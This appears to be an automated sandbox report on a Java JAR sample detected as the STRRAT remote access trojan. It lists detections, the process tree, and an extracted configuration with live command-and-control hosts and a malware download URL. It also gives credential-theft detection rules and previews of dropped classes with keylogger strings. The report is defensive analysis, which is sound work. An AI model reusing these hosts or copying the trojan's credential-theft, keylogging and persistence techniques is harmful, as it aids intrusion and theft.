Windows Analysis Report
MVO4879773357878.jar

Overview

General Information

Sample name: MVO4879773357878.jar
Analysis ID: 1417504
MD5: ee75fce2158c3587daa560419f122001
SHA1: 760d09adceeb4903db4130ef0d28654915844d5d
SHA256: 88a9b4cfac5ba3a433942f8f4e489229f0fd694a7f9a78a8b6ca5cc5dc590e00
Tags: jar, STRRAT

Detection

STRRAT
Score: 92
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
Yara detected STRRAT
Exploit detected, runtime environment starts unknown processes
Contains functionality to query CPU information (cpuid)
Creates a process in suspended mode (likely to inject code)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Tries to load missing DLLs
Uses cacls to modify the permissions of files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

  • System is w10x64
  • 7za.exe (PID: 6796 cmdline: 7za.exe x -y -oC:\jar "C:\Users\user\Desktop\MVO4879773357878.jar" MD5: 77E556CDFDC5C592F5C46DB4127C6F4C)
    • conhost.exe (PID: 6764 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • java.exe (PID: 1800 cmdline: java.exe -jar "C:\Users\user\Desktop\MVO4879773357878.jar" carLambo.FirstRun MD5: 9DAA53BAB2ECB33DC0D9CA51552701FA)
    • conhost.exe (PID: 5764 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • icacls.exe (PID: 3260 cmdline: C:\Windows\system32\icacls.exe C:\ProgramData\Oracle\Java\.oracle_jre_usage /grant "everyone":(OI)(CI)M MD5: 2E49585E4E08565F52090B144062F97E)
      • conhost.exe (PID: 6476 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cleanup
{"C2 list": "d4money.dynamic-dns.net:7888", "url": "http://jbfrost.live/strigoi/server/?hwid=1&lid=m&ht=5", "Proxy": "d4money.dynamic-dns.net:7881", "lid": "khonsari", "Startup": "true", "Secondary Startup": "true", "Scheduled Task": "true"}
Source: akllnBiTjwPmAwfMbajsTFm.class | Rule: INDICATOR_SUSPICIOUS_PWSH_PasswordCredential_RetrievePassword | Description: Detects PowerShell content designed to retrieve passwords from host | Author: ditekSHen | Strings:
  • 0x155:$namespace: Windows.Security.Credentials.PasswordVault
  • 0x3fb:$namespace: Windows.Security.Credentials.PasswordVault
  • 0x18b:$method1: RetrieveAll()
  • 0x1a1:$method2: .RetrievePassword()
Source: C:\jar\carLambo\akllnBiTjwPmAwfMbajsTFm.class | Rule: INDICATOR_SUSPICIOUS_PWSH_PasswordCredential_RetrievePassword | Description: Detects PowerShell content designed to retrieve passwords from host | Author: ditekSHen | Strings:
  • 0x155:$namespace: Windows.Security.Credentials.PasswordVault
  • 0x3fb:$namespace: Windows.Security.Credentials.PasswordVault
  • 0x18b:$method1: RetrieveAll()
  • 0x1a1:$method2: .RetrievePassword()
Source: 00000002.00000002.2872991367.0000000009D69000.00000004.00000800.00020000.00000000.sdmp | Rule: JoeSecurity_STRRAT | Description: Yara detected STRRAT | Author: Joe Security
Source: 00000002.00000002.2872568836.0000000004B90000.00000004.00000800.00020000.00000000.sdmp | Rule: JoeSecurity_STRRAT | Description: Yara detected STRRAT | Author: Joe Security
Source: Process Memory Space: java.exe PID: 1800 | Rule: JoeSecurity_STRRAT | Description: Yara detected STRRAT | Author: Joe Security
        No Sigma rule has matched
        No Snort rule has matched

        AV Detection

        Source: http://jbfrost.live/strigoi/server/?hwid=1&lid=m&ht=5 | URL Reputation: Label: malware
        Source: http://wshsoft.company/multrdp.jpg | Avira URL Cloud: Label: malware
        Source: MVO4879773357878.jar | Malware Configuration Extractor: STRRAT {"C2 list": "d4money.dynamic-dns.net:7888", "url": "http://jbfrost.live/strigoi/server/?hwid=1&lid=m&ht=5", "Proxy": "d4money.dynamic-dns.net:7881", "lid": "khonsari", "Startup": "true", "Secondary Startup": "true", "Scheduled Task": "true"}
        Source: http://wshsoft.company/multrdp.jpg | Virustotal: Detection: 15%
        Source: MVO4879773357878.jar | Virustotal: Detection: 45%
        Source: MVO4879773357878.jar | ReversingLabs: Detection: 39%

        Software Vulnerabilities

        Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exe | Process created: C:\Windows\System32\conhost.exe
        Source: java.exe, 00000002.00000002.2872568836.0000000004B90000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://jbfrost.live/strigoi/server/?hwid=1&lid=m&ht=5
        Source: CHHXGzeSpzwiJOAtZoSZBJ.class | String found in binary or memory: http://wshsoft.company/multrdp.jpg
        Source: DZQmNBgOWWDUGcQCKUlPSbuRpohqT.class | String found in binary or memory: https://github.com/kristian/system-hook/releases/download/3.5/system-hook-3.5.jar
        Source: DZQmNBgOWWDUGcQCKUlPSbuRpohqT.class | String found in binary or memory: https://repo1.maven.org/maven2/net/java/dev/jna/jna-platform/5.5.0/jna-platform-5.5.0.jar
        Source: java.exe, 00000002.00000002.2875286809.0000000016CD2000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://repo1.maven.org/maven2/net/java/dev/jna/jna-platform/5.5.0/jna-platform-5.5.0.jarXs
        Source: DZQmNBgOWWDUGcQCKUlPSbuRpohqT.class | String found in binary or memory: https://repo1.maven.org/maven2/net/java/dev/jna/jna/5.5.0/jna-5.5.0.jar
        Source: DZQmNBgOWWDUGcQCKUlPSbuRpohqT.class | String found in binary or memory: https://repo1.maven.org/maven2/org/xerial/sqlite-jdbc/3.14.2.1/sqlite-jdbc-3.14.2.1.jar
        Source: java.exe, 00000002.00000002.2875286809.0000000016D0B000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://repo1.maven.org/maven2/org/xerial/sqlite-jdbc/3.14.2.1/sqlite-jdbc-3.14.2.1.jarl

        System Summary

        Source: akllnBiTjwPmAwfMbajsTFm.class, type: SAMPLE | Matched rule: Detects PowerShell content designed to retrieve passwords from host | Author: ditekSHen
        Source: C:\jar\carLambo\akllnBiTjwPmAwfMbajsTFm.class, type: DROPPED | Matched rule: Detects PowerShell content designed to retrieve passwords from host | Author: ditekSHen
        Source: akllnBiTjwPmAwfMbajsTFm.class, type: SAMPLE | Matched rule: INDICATOR_SUSPICIOUS_PWSH_PasswordCredential_RetrievePassword author = ditekSHen, description = Detects PowerShell content designed to retrieve passwords from host
        Source: C:\jar\carLambo\akllnBiTjwPmAwfMbajsTFm.class, type: DROPPED | Matched rule: INDICATOR_SUSPICIOUS_PWSH_PasswordCredential_RetrievePassword author = ditekSHen, description = Detects PowerShell content designed to retrieve passwords from host
        Source: classification engine | Classification label: mal92.troj.expl.winJAR@7/81@0/0
        Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exe | Mutant created: NULL
        Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5764:120:WilError_03
        Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6764:120:WilError_03
        Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6476:120:WilError_03
        Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exe | File created: C:\Users\user\AppData\Local\Temp\hsperfdata_user
        Source: C:\Windows\System32\7za.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
        Source: ETIKYbEhuMLgDjIJSHDmGnlmeMsm.class.0.dr | Binary or memory string: SELECT * FROM logins;
        Source: MVO4879773357878.jar | Virustotal: Detection: 45%
        Source: MVO4879773357878.jar | ReversingLabs: Detection: 39%
        Source: unknown | Process created: C:\Windows\System32\7za.exe 7za.exe x -y -oC:\jar "C:\Users\user\Desktop\MVO4879773357878.jar"
        Source: C:\Windows\System32\7za.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: unknown | Process created: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exe java.exe -jar "C:\Users\user\Desktop\MVO4879773357878.jar" carLambo.FirstRun
        Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exe | Process created: C:\Windows\SysWOW64\icacls.exe C:\Windows\system32\icacls.exe C:\ProgramData\Oracle\Java\.oracle_jre_usage /grant "everyone":(OI)(CI)M
        Source: C:\Windows\SysWOW64\icacls.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: Window Recorder | Window detected: More than 3 window changes detected
        Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exe | Code function: 2_2_0262A20A push ecx; ret 2_2_0262A21A
        Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exe | Code function: 2_2_0262A21B push ecx; ret 2_2_0262A225
        Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exe | Code function: 2_2_0262BB67 push 00000000h; mov dword ptr [esp], esp 2_2_0262BB8D
        Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exe | Code function: 2_2_0262B3B7 push 00000000h; mov dword ptr [esp], esp 2_2_0262B3DD
        Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exe | Code function: 2_2_0262B947 push 00000000h; mov dword ptr [esp], esp 2_2_0262B96D
        Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exe | Code function: 2_2_0262C477 push 00000000h; mov dword ptr [esp], esp 2_2_0262C49D
        Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed
        Source: java.exe, 00000002.00000003.1624831012.000000001675B000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: com/sun/corba/se/impl/util/SUNVMCID.classPK
        Source: java.exe, 00000002.00000003.1624831012.000000001675B000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: &com/sun/corba/se/impl/util/SUNVMCID.classPK
        Source: java.exe, 00000002.00000003.1624831012.000000001675B000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: org/omg/CORBA/OMGVMCID.classPK
        Source: java.exe, 00000002.00000002.2873568368.0000000014800000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: cjava/lang/VirtualMachineError
        Source: java.exe, 00000002.00000003.1624831012.000000001675B000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: java/lang/VirtualMachineError.classPK
        Source: java.exe, 00000002.00000002.2872166413.0000000000C7B000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: 2[Ljava/lang/VirtualMachineError;
        Source: java.exe, 00000002.00000002.2872166413.0000000000C7B000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
        Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exe | Memory protected: page read and write | page guard
        Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exe | Code function: 2_2_026203C0 cpuid 2_2_026203C0
        Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exe | Queries volume information: C:\Program Files (x86)\Java\jre-1.8\bin\client\jvm.dll VolumeInformation
        Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\hsperfdata_user\1800 VolumeInformation
        Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exe | Queries volume information: C:\Program Files (x86)\Java\jre-1.8\lib\resources.jar VolumeInformation
        Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exe | Queries volume information: C:\Program Files (x86)\Java\jre-1.8\lib\meta-index VolumeInformation

        Stealing of Sensitive Information

        Source: Yara match | File source: 00000002.00000002.2872991367.0000000009D69000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: Yara match | File source: 00000002.00000002.2872568836.0000000004B90000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: Yara match | File source: Process Memory Space: java.exe PID: 1800, type: MEMORYSTR

        Remote Access Functionality

        Source: Yara match | File source: 00000002.00000002.2872991367.0000000009D69000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: Yara match | File source: 00000002.00000002.2872568836.0000000004B90000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: Yara match | File source: Process Memory Space: java.exe PID: 1800, type: MEMORYSTR
        Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
        Gather Victim Identity Information | Acquire Infrastructure | Valid Accounts | 1 Exploitation for Client Execution | 1 Services File Permissions Weakness | 1 Services File Permissions Weakness | 1 Services File Permissions Weakness | OS Credential Dumping | 1 Security Software Discovery | Remote Services | Data from Local System | Data Obfuscation | Exfiltration Over Other Network Medium | Abuse Accessibility Features
        Credentials | Domains | Default Accounts | Scheduled Task/Job | 1 DLL Side-Loading | 11 Process Injection | 1 Disable or Modify Tools | LSASS Memory | 21 System Information Discovery | Remote Desktop Protocol | Data from Removable Media | Junk Data | Exfiltration Over Bluetooth | Network Denial of Service
        Email Addresses | DNS Server | Domain Accounts | At | Logon Script (Windows) | 1 DLL Side-Loading | 11 Process Injection | Security Account Manager | Query Registry | SMB/Windows Admin Shares | Data from Network Shared Drive | Steganography | Automated Exfiltration | Data Encrypted for Impact
        Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | Login Hook | 1 DLL Side-Loading | NTDS | System Network Configuration Discovery | Distributed Component Object Model | Input Capture | Protocol Impersonation | Traffic Duplication | Data Destruction
        Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 1 Obfuscated Files or Information | LSA Secrets | Internet Connection Discovery | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact
        [Behavior graph: ID 1417504, sample MVO4879773357878.jar, start date 29/03/2024, architecture WINDOWS, score 92. Signatures shown: Multi AV Scanner detection for domain / URL; Found malware configuration; Malicious sample detected (through community Yara rule); 4 other signatures. Process tree: java.exe started icacls.exe and conhost.exe; icacls.exe started conhost.exe; 7za.exe started conhost.exe.]

        Source | Detection | Scanner | Label
        MVO4879773357878.jar | 45% | Virustotal |
        MVO4879773357878.jar | 39% | ReversingLabs | ByteCode-JAVA.Trojan.Strrat
        No Antivirus matches
        Source | Detection | Scanner | Label
        http://jbfrost.live/strigoi/server/?hwid=1&lid=m&ht=5 | 100% | URL Reputation | malware
        http://bugreport.sun.com/bugreport/ | 0% | URL Reputation | safe
        http://wshsoft.company/multrdp.jpg | 100% | Avira URL Cloud | malware
        http://wshsoft.company/multrdp.jpg | 16% | Virustotal |
        No contacted domains info
        Name | Source | Malicious | Antivirus Detection | Reputation
        http://java.oracle.com/ | java.exe, 00000002.00000002.2872991367.0000000009D99000.00000004.00000800.00020000.00000000.sdmp | false | | high
        http://null.oracle.com/ | java.exe, 00000002.00000003.1677262279.0000000016B85000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000002.00000003.1676798758.0000000016B7E000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000002.00000002.2872991367.0000000009F17000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000002.00000002.2872568836.0000000004BDE000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000002.00000003.1676858044.0000000016B85000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000002.00000002.2875177365.0000000016B8D000.00000004.00000020.00020000.00000000.sdmp | false | | high
        https://repo1.maven.org/maven2/net/java/dev/jna/jna-platform/5.5.0/jna-platform-5.5.0.jar | DZQmNBgOWWDUGcQCKUlPSbuRpohqT.class | false | | high
        https://repo1.maven.org/maven2/org/xerial/sqlite-jdbc/3.14.2.1/sqlite-jdbc-3.14.2.1.jarl | java.exe, 00000002.00000002.2875286809.0000000016D0B000.00000004.00000020.00020000.00000000.sdmp | false | | high
        https://repo1.maven.org/maven2/net/java/dev/jna/jna/5.5.0/jna-5.5.0.jar | DZQmNBgOWWDUGcQCKUlPSbuRpohqT.class | false | | high
        http://jbfrost.live/strigoi/server/?hwid=1&lid=m&ht=5 | java.exe, 00000002.00000002.2872568836.0000000004B90000.00000004.00000800.00020000.00000000.sdmp | true | URL Reputation: malware | unknown
        https://repo1.maven.org/maven2/net/java/dev/jna/jna-platform/5.5.0/jna-platform-5.5.0.jarXs | java.exe, 00000002.00000002.2875286809.0000000016CD2000.00000004.00000020.00020000.00000000.sdmp | false | | high
        http://wshsoft.company/multrdp.jpg | CHHXGzeSpzwiJOAtZoSZBJ.class | false | 16%, Virustotal; Avira URL Cloud: malware | unknown
        https://repo1.maven.org/maven2/org/xerial/sqlite-jdbc/3.14.2.1/sqlite-jdbc-3.14.2.1.jar | DZQmNBgOWWDUGcQCKUlPSbuRpohqT.class | false | | high
        http://bugreport.sun.com/bugreport/ | java.exe, 00000002.00000002.2872991367.0000000009D94000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
        https://github.com/kristian/system-hook/releases/download/3.5/system-hook-3.5.jar | DZQmNBgOWWDUGcQCKUlPSbuRpohqT.class | false | | high
        No contacted IP infos
                        Joe Sandbox version:40.0.0 Tourmaline
                        Analysis ID:1417504
                        Start date and time:2024-03-29 13:57:41 +01:00
                        Joe Sandbox product:CloudBasic
                        Overall analysis duration:0h 4m 48s
                        Hypervisor based Inspection enabled:false
                        Report type:full
                        Cookbook file name:defaultwindowsfilecookbook.jbs
                        Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                        Run name:Without Tracing
                        Number of analysed new started processes analysed:10
                        Number of new started drivers analysed:0
                        Number of existing processes analysed:0
                        Number of existing drivers analysed:0
                        Number of injected processes analysed:0
                        Technologies:
                        • HCA enabled
                        • EGA enabled
                        • AMSI enabled
                        Analysis Mode:default
                        Analysis stop reason:Timeout
                        Sample name:MVO4879773357878.jar
                        Detection:MAL
                        Classification:mal92.troj.expl.winJAR@7/81@0/0
                        EGA Information:Failed
                        HCA Information:
                        • Successful, ratio: 100%
                        • Number of executed functions: 11
                        • Number of non-executed functions: 1
                        Cookbook Comments:
                        • Found application associated with file extension: .jar
                        • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                        • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                        • Execution Graph export aborted for target java.exe, PID 1800 because it is empty
                        • Not all processes were analyzed, report is missing behavior information
                        • Report size getting too big, too many NtSetInformationFile calls found.
                        No simulations
                        No context
                        Process:C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exe
                        File Type:ASCII text, with CRLF line terminators
                        Category:dropped
                        Size (bytes):52
                        Entropy (8bit):4.690260390968384
                        Encrypted:false
                        Malicious:false
                        Reputation:low
                        Preview:C:\Program Files (x86)\Java\jre-1.8..1711717107083..
                        Process:C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):65536
                        Entropy (8bit):1.2900581267383067
                        Encrypted:false
                        Malicious:false
                        Reputation:low
                        Process:C:\Windows\System32\7za.exe
                        File Type:ASCII text, with CRLF line terminators
                        Category:dropped
                        Size (bytes):410
                        Entropy (8bit):5.098341072037115
                        Encrypted:false
                        Malicious:false
                        Reputation:low
                        Preview:Manifest-Version: 1.0..Ant-Version: Apache Ant 1.9.7..Created-By: 1.8.0_381-b09 (Oracle Corporation)..Class-Path: lib/system-hook-3.5.jar lib/jna-5.5.0.jar lib/jna-platform.. -5.5.0.jar lib/sqlite-jdbc-3.14.2.1.jar lib/jna-5.5.0.jar lib/jna-pla.. tform-5.5.0.jar lib/sqlite-jdbc-3.14.2.1.jar lib/system-hook-3.5.jar..X-COMMENT: Main-Class will be added automatically by build..Main-Class: carLambo.FirstRun....
                        Process:C:\Windows\System32\7za.exe
                        File Type:compiled Java class data, version 52.0 (Java 1.8)
                        Category:dropped
                        Size (bytes):6300
                        Entropy (8bit):5.933785243555052
                        Encrypted:false
                        Malicious:false
                        Reputation:low
                        Process:C:\Windows\System32\7za.exe
                        File Type:compiled Java class data, version 52.0 (Java 1.8)
                        Category:dropped
                        Size (bytes):430
                        Entropy (8bit):5.559054251801829
                        Encrypted:false
                        Malicious:false
                        Reputation:low
                        Preview:.......4...............................................()V..+(LcarLambo/XfrcwHiEekkBljrjyatNOjRICOGWh;)V...<init>...Code..(LcarLambo/XfrcwHiEekkBljrjyatNOjRICOGWh;.. carLambo/ANLvCFyChcJzVnLHSqeekHx..&carLambo/XfrcwHiEekkBljrjyatNOjRICOGWh...gQEuyVcYntwPXTysEtfquh...java/lang/Object...java/lang/Runnable...nnHRYoAONroTDXAkGOnAtRE...run.0..........................................*+...*..............................*.............
                        Process:C:\Windows\System32\7za.exe
                        File Type:compiled Java class data, version 52.0 (Java 1.8)
                        Category:dropped
                        Size (bytes):1215
                        Entropy (8bit):5.846385683550119
                        Encrypted:false
                        Malicious:false
                        Preview:.......4.M..(..5..<..=..>..?..C..D..E..F..G..H.........$.... ....#.........'.........!....&..............%........."..3.+..3.1..;.0..@./..@.8..@.9..A.,..B.)..I.6..I.7..J.*..K.-..L.2..........()Ljava/io/OutputStream;...()Ljava/lang/String;...()V...()[B...(I)Ljava/lang/String;..$(LcarLambo/CHHXGzeSpzwiJOAtZoSZBJ;)V..X(LcarLambo/CHHXGzeSpzwiJOAtZoSZBJ;Ljava/net/Socket;LcarLambo/SjomlJrGISDYNqiAAulMONOv;)V..-(Ljava/lang/String;)Ljava/lang/StringBuilder;...(Ljava/lang/String;I)V...([B)V...<init>...Code...HRDP-SOC:...I..(LcarLambo/AimdQBqtwmRlTmfOwmvjwNywPJZsM;..!LcarLambo/CHHXGzeSpzwiJOAtZoSZBJ;...Ljava/lang/String;...StackMapTable...append..&carLambo/AimdQBqtwmRlTmfOwmvjwNywPJZsM...carLambo/CHHXGzeSpzwiJOAtZoSZBJ..!carLambo/SjomlJrGISDYNqiAAulMONOv...carLambo/rCYbIngZMxCXvVYABulZ...gQEuyVcYntwPXTysEtfquh...getBytes...getOutputStream...java/io/OutputStream...java/lang/Exception...java/lang/Object...java/lang/String...java/lang/StringBuilder...java/net/Socket...nnHRYoAONroTDXAkGOnAtRE...toSt
                        Process:C:\Windows\System32\7za.exe
                        File Type:compiled Java class data, version 52.0 (Java 1.8)
                        Category:dropped
                        Size (bytes):562
                        Entropy (8bit):5.6361079950340995
                        Encrypted:false
                        Malicious:false
                        Preview:.......4.%..............!.."............................................... ....#....$.....()Ljava/lang/String;...()V..-(Ljava/lang/String;)Ljava/lang/StringBuilder;...(Ljava/lang/String;)V...<clinit>...<init>...C:\Users\...Code...Ljava/lang/String;...\AppData...append..&carLambo/BAvsXDspdJYXQBvXhSPZNfejgtqGP..$carLambo/toANhLheFpVIBJATjkPJUTCvbMu...gQEuyVcYntwPXTysEtfquh...java/lang/Object...java/lang/StringBuilder...nnHRYoAONroTDXAkGOnAtRE...toString.1........... ............................*.....................'...........Y.............................
                        Process:C:\Windows\System32\7za.exe
                        File Type:compiled Java class data, version 52.0 (Java 1.8)
                        Category:dropped
                        Size (bytes):10718
                        Entropy (8bit):6.196638428730907
                        Encrypted:false
                        Malicious:false
                        Process:C:\Windows\System32\7za.exe
                        File Type:compiled Java class data, version 52.0 (Java 1.8)
                        Category:dropped
                        Size (bytes):3221
                        Entropy (8bit):5.688218794925527
                        Encrypted:false
                        Malicious:false
                        Preview:.......4.p..B..C..D..E..F..G..H..I..J..K..L..M..N..O..P..Q..R..S..T..U..V..W..X..Y..Z..[..\..]..^.._..`..a..b..c..d..j..m..n..".1..#.0..$.6..%./..&.2..&.3..&.4..&.5..>.9..e.<..e.A..f.7..g.8..h.:..i.:..o.;...()C...()I...()V...()Z...(C)Ljava/lang/String;...(Ljava/lang/String;)V..0(Llc/kra/system/keyboard/event/GlobalKeyEvent;)V...<init>...Code...StackMapTable...Z...[Back]...[Ctrl-A]...[Ctrl-B]...[Ctrl-C]...[Ctrl-D]...[Ctrl-E]...[Ctrl-F]...[Ctrl-G]...[Ctrl-H]...[Ctrl-I]...[Ctrl-J]...[Ctrl-K]...[Ctrl-L]...[Ctrl-M]...[Ctrl-N]...[Ctrl-O]...[Ctrl-P]...[Ctrl-Q]...[Ctrl-R]...[Ctrl-S]...[Ctrl-T]...[Ctrl-U]...[Ctrl-V]...[Ctrl-W]...[Ctrl-X]...[Ctrl-Y]...[Ctrl-Z]...[DOWN]...[ENTER]...[LEFT]...[RIGHT]...[UP]...[esc]..'carLambo/CHHXGzeSpzwiJOAtZoSZBJOdYDRcQU..!carLambo/cUFMRzrqZzmkSJziceHSMVGQ...gQEuyVcYntwPXTysEtfquh...getKeyChar...getVirtualKeyCode...isControlPressed...isShiftPressed...java/lang/String...keyPressed...keyReleased..-lc/kra/system/keyboard/event/GlobalKeyAdapter..+lc/kra/system/keyboa
                        Process:C:\Windows\System32\7za.exe
                        File Type:compiled Java class data, version 52.0 (Java 1.8)
                        Category:dropped
                        Size (bytes):2712
                        Entropy (8bit):5.635937729097937
                        Encrypted:false
                        Malicious:false
                        Preview:.......4....\..].._..f..g..h..i..j..k..l..m..n..o..p..q..r..s..t....0....9....>....,....?....-....:....;....<....+....@....+....+....2....7..../....6....3....8.........1....5....=....4..W.F..W.I..W.R..^.L..`.Q..a.Z..b.K..c.H..d.G..e.C..u.E..v.J..w.G..x.A..y.Z..z.N..{.O..|.P..}.M..~.Y....B....B...()Ljava/lang/Object;...()Ljava/lang/String;...()Ljava/util/Iterator;...()Ljava/util/List;...()Ljava/util/Set;...()V...()Z...(I)Ljava/lang/String;...(Ljava/io/Reader;)V..3(Ljava/lang/CharSequence;)Ljava/util/regex/Matcher;..&(Ljava/lang/Object;)Ljava/lang/Object;...(Ljava/lang/Object;)Z..8(Ljava/lang/Object;Ljava/lang/Object;)Ljava/lang/Object;...(Ljava/lang/String;)D...(Ljava/lang/String;)F...(Ljava/lang/String;)I..-(Ljava/lang/String;)Ljava/util/regex/Pattern;...(Ljava/lang/String;)V..((Ljava/lang/String;Ljava/lang/String;D)D..((Ljava/lang/String;Ljava/lang/String;F)F..((Ljava/lang/String;Ljava/lang/String;I)I..J(Ljava/lang/String;Ljava/lang/String;Ljava/lang/String;)Ljava/lang/String;...<init
                        Process:C:\Windows\System32\7za.exe
                        File Type:compiled Java class data, version 52.0 (Java 1.8)
                        Category:dropped
                        Size (bytes):149
                        Entropy (8bit):4.799145086010896
                        Encrypted:false
                        Malicious:false
                        Preview:.......4.....................()V...<init>...Code.."carLambo/CVahPcpwAqEGgjZCgeRHqvzav...java/lang/Object.1................................*..........
                        Process:C:\Windows\System32\7za.exe
                        File Type:compiled Java class data, version 52.0 (Java 1.8)
                        Category:dropped
                        Size (bytes):622
                        Entropy (8bit):5.779903624407434
                        Encrypted:false
                        Malicious:false
                        Preview:.......4...................................................................()V..](LcarLambo/AILeJFODIHNyHULMHPDMqXVIZVnaVD;Ljava/net/Socket;LcarLambo/iWGSWxRnUlPNEVGNllqlF;)V...<init>...Code..)LcarLambo/AILeJFODIHNyHULMHPDMqXVIZVnaVD;.. LcarLambo/iWGSWxRnUlPNEVGNllqlF;...Ljava/net/Socket;..'carLambo/AILeJFODIHNyHULMHPDMqXVIZVnaVD..%carLambo/DPSFZBMQYgMSdqRKnSjeeHqvknUN...gQEuyVcYntwPXTysEtfquh...java/lang/Object...java/lang/Runnable...nnHRYoAONroTDXAkGOnAtRE...qvNsplybcQmnatGjnQTThBZ...run.0................................................. ........*+...*,...*-...*..............................*...*...*.............
                        Process:C:\Windows\System32\7za.exe
                        File Type:compiled Java class data, version 52.0 (Java 1.8)
                        Category:dropped
                        Size (bytes):1775
                        Entropy (8bit):5.92778080882633
                        Encrypted:false
                        Malicious:false
